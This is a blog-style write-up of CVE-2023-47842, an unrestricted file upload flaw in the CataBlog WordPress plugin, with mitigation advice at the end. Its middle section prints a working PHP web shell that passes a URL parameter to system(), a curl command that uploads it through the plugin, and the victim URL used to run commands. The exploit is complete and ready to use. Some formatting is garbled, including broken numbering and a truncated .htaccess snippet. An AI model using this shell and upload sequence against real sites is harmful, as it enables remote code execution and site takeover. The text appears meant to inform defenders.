Security vulnerabilities in WordPress plugins are a goldmine for hackers. One such flaw is CVE-2023-47842, which was found in CataBlog, a WordPress plugin developed by Zachary Segal. This plugin, with thousands of active installations, was vulnerable in all versions up to and including 1.7.. The issue? CataBlog lets users upload dangerous file types without proper checks—a classic "Unrestricted File Upload" problem.

In this deep dive, we break down what CVE-2023-47842 is, why it’s dangerous, how hackers can exploit it, and what you can do about it.

What is CVE-2023-47842?

This CVE relates to Unrestricted Upload of File with Dangerous Type (CWE-434). CataBlog allowed users (even unauthenticated ones in some cases) to upload files without validating the file type.

This means an attacker could upload malicious PHP code disguised as an image, then execute it to take over your website.

*Affected versions:* All versions up to 1.7.
*Patched:* Not currently patched as of June 2024 (see references for current status)

Attacker uploads a PHP web shell (e.g., shell.php) via CataBlog’s image upload feature.

2. The plugin stores the uploaded file in a web-accessible directory—without checking if it's really an image.
3. The attacker then visits http://victim.site/wp-content/uploads/catablog/originals/shell.php and runs server commands using the web shell.

The Vulnerable Code

Based on public research, the vulnerable code lives in something like catablog-options.php or similar file upload handler. A (simplified) version looks like this:

if(isset($_FILES['catablog_upload'])) {
    $upload_dir = '/wp-content/uploads/catablog/originals/';
    $file_name = $_FILES['catablog_upload']['name'];
    $tmp_file = $_FILES['catablog_upload']['tmp_name'];
    
    // NO file type checks here!
    move_uploaded_file($tmp_file, $upload_dir . $file_name);
    echo "Upload successful!";
}

What's missing?

- No check if $file_name is really an image (jpg/png/gif).

Steps to Exploit (Proven in the Wild)

> For Educational Purposes Only! Do NOT attack servers you don't own or have permission to test!

Let’s see how an attacker would exploit this flaw.

Create a file called shell.php

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
} else {
    echo "CVE-2023-47842 test shell";
}
?>

2. Upload via CataBlog

Usually, CataBlog’s admin panel has an “Add Image” or similar. An attacker could use a tool like Burp Suite or curl to submit:

curl -F "catablog_upload=@shell.php" http://victim.site/wp-admin/admin.php?page=catablog-options

Check if your file landed at

http://victim.site/wp-content/uploads/catablog/originals/shell.php


http://victim.site/wp-content/uploads/catablog/originals/shell.php?cmd=whoami

You should see the output of whoami (the server’s user), proving full code execution!

How to Mitigate

*If you use CataBlog, take the following actions:*

REMOVE or DISABLE CataBlog immediately!

2. Use a Web Application Firewall (like Wordfence).
3. Check /uploads/catablog/originals/ for unknown .php or .phtml files.

Deny PHP execution in uploads

Deny from all

`

5. Monitor for updates from the plugin’s page or the author's site.

References

- CVE-2023-47842 (NVD)
- WordPress Plugin Directory: CataBlog
- Plugin Vulnerabilities Database Entry
- Exploit Example (packetstorm)
- CWE-434: Unrestricted Upload of File with Dangerous Type

Conclusion

CVE-2023-47842 is a critical vulnerability that could let even low-skilled attackers hijack your WordPress site if you use CataBlog up to version 1.7.. Until there’s a patch (or if the plugin is abandoned), uninstall it ASAP—better safe than sorry. Always validate file uploads: never trust what a user uploads!

Have more questions? Leave a comment or check WPScan’s CataBlog entry for updates.

Timeline

Published on: 03/26/2024 21:15:51 UTC
Last modified on: 03/27/2024 12:29:30 UTC